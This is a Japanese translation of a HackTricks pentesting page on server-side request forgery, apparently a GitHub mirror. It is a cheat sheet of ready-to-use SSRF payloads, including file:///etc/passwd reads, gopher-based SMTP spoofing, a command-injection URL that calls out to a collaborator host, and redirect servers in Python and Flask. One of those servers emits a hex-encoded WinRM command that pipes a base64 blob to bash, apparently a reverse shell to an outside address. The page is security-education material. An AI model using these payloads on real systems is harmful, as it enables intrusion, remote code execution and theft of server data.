mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00

History

Translator 2aade64a6c Translated ['pentesting-web/ssrf-server-side-request-forgery/README.md',		2023-12-25 18:01:55 +00:00
..
cloud-ssrf.md	Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene	2023-09-03 01:45:18 +00:00
README.md	Translated ['pentesting-web/ssrf-server-side-request-forgery/README.md',	2023-12-25 18:01:55 +00:00
ssrf-vulnerable-platforms.md	Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi	2023-12-16 14:46:09 +00:00
url-format-bypass.md	Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene	2023-09-03 01:45:18 +00:00

README.md

SSRF (Server Side Request Forgery)

Trickestを使用して、世界で最も進んだコミュニティツールによって動力を供給されたワークフローを簡単に構築し自動化します。
今すぐアクセス：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ会社で働いていますか？HackTricksに広告を掲載したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？サブスクリプションプランをチェックしてください！
The PEASS Familyを発見し、私たちの独占的なNFTsコレクションを手に入れましょう。
公式のPEASS & HackTricksグッズを入手しましょう。
💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。
hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出して、ハッキングのコツを共有してください。

サーバーサイドリクエストフォージェリ（SSRFとも呼ばれる）は、攻撃者がサーバーサイドアプリケーションに任意のドメインへのHTTPリクエストを行わせることを可能にするWebセキュリティの脆弱性です。（こちらから）

SSRFのキャプチャ

最初に行うべきことは、あなたによって引き起こされたSSRFのインタラクションをキャプチャすることです。HTTPまたはDNSのインタラクションをキャプチャするには、以下のツールを使用できます：

Burpcollab
pingb
canarytokens
interractsh
http://webhook.site
https://github.com/teknogeek/ssrf-sheriff

ホワイトリストされたドメインのバイパス

通常、SSRFは特定のホワイトリストに登録されたドメインまたはURLでのみ機能することがわかります。次のページでは、そのホワイトリストをバイパスしようとする技術のコンパイルがあります：

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

オープンリダイレクトを介したバイパス

サーバーが適切に保護されている場合、Webページ内のオープンリダイレクトを悪用することで、すべての制限をバイパスすることができます。Webページは同じドメインへのSSRFを許可し、おそらくはリダイレクトをフォローするため、オープンリダイレクトを悪用してサーバーに内部リソースへのアクセスをさせることができます。
詳細はこちら：https://portswigger.net/web-security/ssrf

プロトコル

file://

file:///etc/passwd

dict://

DICT URLスキームは、DICTプロトコルを使用して利用可能な定義や単語リストを参照するために使用されます。

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

SFTP://

セキュアシェルを介した安全なファイル転送に使用されるネットワークプロトコル

ssrf.php?url=sftp://evil.com:11111/

TFTP://

Trivial File Transfer ProtocolはUDPを使用して動作します

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

LDAP://

Lightweight Directory Access Protocol（LDAP）は、IPネットワーク上で使用されるアプリケーションプロトコルです。これは、分散ディレクトリ情報サービスを管理およびアクセスするために使用されます。

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

Gopher://

このプロトコルを使用すると、サーバーに送信させたいIP、ポート、およびバイトを指定できます。その後、SSRFを悪用して任意のTCPサーバーと通信できます（ただし、最初にサービスとどのように話すかを知っている必要があります）。
幸いなことに、Gopherusを使用して、いくつかのサービスのペイロードを作成できます。さらに、remote-method-guesserを使用して、Java RMI サービスの_gopher_ペイロードを作成することができます。

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 1337へのバックコネクト

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SMTP

https://twitter.com/har1sec/status/1182255952055164929より:
1. SMTP localhost:25にSSRFで接続する
2. 最初の行から内部ドメイン名を取得する 220 http://blabla.internaldomain.com ESMTP Sendmail
3. http://internaldomain.comをGitHubで検索し、サブドメインを見つける
4. 接続する

Curl URL globbing - WAFバイパス

SSRFがcurlによって実行される場合、curlにはWAFをバイパスするのに役立つURL globbingという機能があります。例えば、このwriteupには、fileプロトコル経由のパストラバーサルの例があります：

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

SSRFリクエストのキャプチャ

Burp Collaborator
http://requestrepo.com/
https://app.interactsh.com/
https://github.com/stolenusername/cowitness
https://github.com/dwisiswant0/ngocok - ngrokを使用したBurp Collaborator

Referrerヘッダーを介したSSRF

一部のアプリケーションでは、訪問者を追跡するサーバーサイドの分析ソフトウェアを使用しています。このソフトウェアは、リンク元を追跡するために特に興味があるため、リクエストのReferrerヘッダーをしばしば記録します。分析ソフトウェアは、Referrerヘッダーに現れる第三者のURLを実際に訪問することがよくあります。これは通常、リンク元サイトの内容を分析するために行われ、リンクに使用されるアンカーテキストを含みます。その結果、RefererヘッダーはしばしばSSRFの脆弱性に対する有益な攻撃面を表しています。
この種の「隠された」脆弱性を発見するためには、Burpのプラグイン「Collaborator Everywhere」を使用できます。

証明書からのSNIデータを介したSSRF

任意のバックエンドに接続を許可する最も単純な誤設定は、次のようなものになるでしょう：

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

ここでは、SNIフィールドの値がバックエンドのアドレスとして直接使用されます。

この安全でない設定では、SNIフィールドに希望のIPアドレスまたはドメイン名を指定するだけでSSRF脆弱性を簡単に悪用できます。例えば、以下のコマンドはNginxに_internal.host.com_へ接続させます：

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf

Wget ファイルアップロード

コマンドインジェクションを伴うSSRF

次のようなペイロードを試す価値があるかもしれません: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFレンダリング

ウェブページが提供された情報で自動的にPDFを作成している場合、PDF作成者（サーバー）自身がPDFを作成する際に実行されるJSを挿入して、SSRFを悪用することができます。こちらで詳細を確認してください。

SSRFからDoSへ

複数のセッションを作成し、セッションを利用して重いファイルのダウンロードを試みることでSSRFを悪用してDoSを実行します。

SSRF PHP関数

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

GopherへのSSRFリダイレクト

いくつかの悪用では、リダイレクトレスポンスを送信する（gopherのような異なるプロトコルを使用するために）必要があるかもしれません。ここにリダイレクトで応答するための異なるpythonコードがあります：

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

## DNS Rebidding CORS/SOP バイパス

ローカルIPからのコンテンツの**流出**に**問題**がある場合、**DNS Rebidding**を使用してCORS/SOPの制限をバイパスできます。

{% content-ref url="../cors-bypass.md" %}
[cors-bypass.md](../cors-bypass.md)
{% endcontent-ref %}

### 自動化されたDNS Rebidding

[**`Singularity of Origin`**](https://github.com/nccgroup/singularity)は、[DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding)攻撃を実行するツールです。攻撃サーバーのDNS名のIPアドレスをターゲットマシンのIPアドレスに再バインドし、ターゲットマシン上の脆弱なソフトウェアを悪用するための攻撃ペイロードを提供するための必要なコンポーネントが含まれています。

また、[**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)で**公開されているサーバー**もチェックしてください。

## DNS Rebidding + TLSセッションID/セッションチケット

要件:

* **SSRF**
* **アウトバウンドTLSセッション**
* **ローカルポート上のもの**

攻撃:

1. ユーザー/ボットに攻撃者が管理する**ドメイン**に**アクセス**するよう依頼します。
2. **DNS**の**TTL**は**0**秒です（そのため、被害者はすぐにドメインのIPを再確認します）。
3. 被害者と攻撃者のドメイン間に**TLS接続**が作成されます。攻撃者は**セッションIDまたはセッションチケット**内に**ペイロード**を挿入します。
4. **ドメイン**は自分自身に対して**無限ループ**のリダイレクトを開始します。これにより、ユーザー/ボットがドメインにアクセスし続け、**再び**ドメインの**DNSリクエスト**を実行することが目的です。
5. DNSリクエストでは、**プライベートIP**アドレスが**今**与えられます（例：127.0.0.1）。
6. ユーザー/ボットは**TLS接続**を再確立しようとし、そのために攻撃者の**ペイロード**が含まれていた**セッション**ID/チケットIDを**送信**します。おめでとうございます、ユーザー/ボットに自分自身を攻撃させることに成功しました。

この攻撃中に、localhost:11211（_memcache_）を攻撃したい場合は、被害者に最初にwww.attacker.com:11211との接続を確立させる必要があります（**ポートは常に同じでなければなりません**）。\
この攻撃を**実行するためのツール**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
**詳細情報**については、この攻撃が説明されているトークをご覧ください: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)

## Blind SSRF

ブラインドSSRFと非ブラインドSSRFの違いは、ブラインドではSSRFリクエストのレスポンスを見ることができないことです。そのため、既知の脆弱性のみを悪用することができ、より難しいです。

### 時間ベースのSSRF

サーバーからのレスポンスの**時間を確認する**ことで、リソースが存在するかどうかを**知ることが可能**です（存在するリソースにアクセスするのに時間がかかる場合があります）。

## クラウドSSRFの悪用

クラウド環境内で実行されているマシンでSSRFの脆弱性を見つけた場合、クラウド環境に関する興味深い情報や、さらにはクレデンシャルを取得することができるかもしれません：

{% content-ref url="cloud-ssrf.md" %}
[cloud-ssrf.md](cloud-ssrf.md)
{% endcontent-ref %}

## SSRF脆弱性のあるプラットフォーム

いくつかの既知のプラットフォームにはSSRFの脆弱性が含まれているか、含まれていたことがあります。それらをチェックしてください：

{% content-ref url="ssrf-vulnerable-platforms.md" %}
[ssrf-vulnerable-platforms.md](ssrf-vulnerable-platforms.md)
{% endcontent-ref %}

## ツール

### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)

SSRFの脆弱性を検出し、悪用するツール

### [Gopherus](https://github.com/tarunkant/Gopherus)

* [Gopherusに関するブログ投稿](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)

このツールは以下のためのGopherペイロードを生成します：

* MySQL
* PostgreSQL
* FastCGI
* Redis
* Zabbix
* Memcache

### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)

* [SSRF使用に関するブログ投稿](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)

_remote-method-guesser_は、最も一般的な_Java RMI_の脆弱性に対する攻撃操作をサポートする_Java RMI_脆弱性スキャナーです。利用可能な操作のほとんどは`--ssrf`オプションをサポートしており、要求された操作のための_SSRF_ペイロードを生成できます。`--gopher`オプションと一緒に使用すると、直接使用可能な_gopher_ペイロードを直接生成できます。

### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)

SSRF Proxyは、サーバーサイドリクエストフォージェリ（SSRF）に脆弱なHTTPサーバーを介してクライアントHTTPトラフィックをトンネリングするために設計されたマルチスレッドHTTPプロキシサーバーです。

### 練習する

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

## 参考文献

* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
* [https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* **サイバーセキュリティ会社**で働いていますか？**HackTricksに広告を掲載**したいですか？または、**PEASSの最新バージョンにアクセス**したり、HackTricksをPDFで**ダウンロード**したいですか？[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* [**hacktricks repo**](https://github.com/carlospolop/hacktricks)と[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを**共有してください。**

</details>

README.md Unescape Escape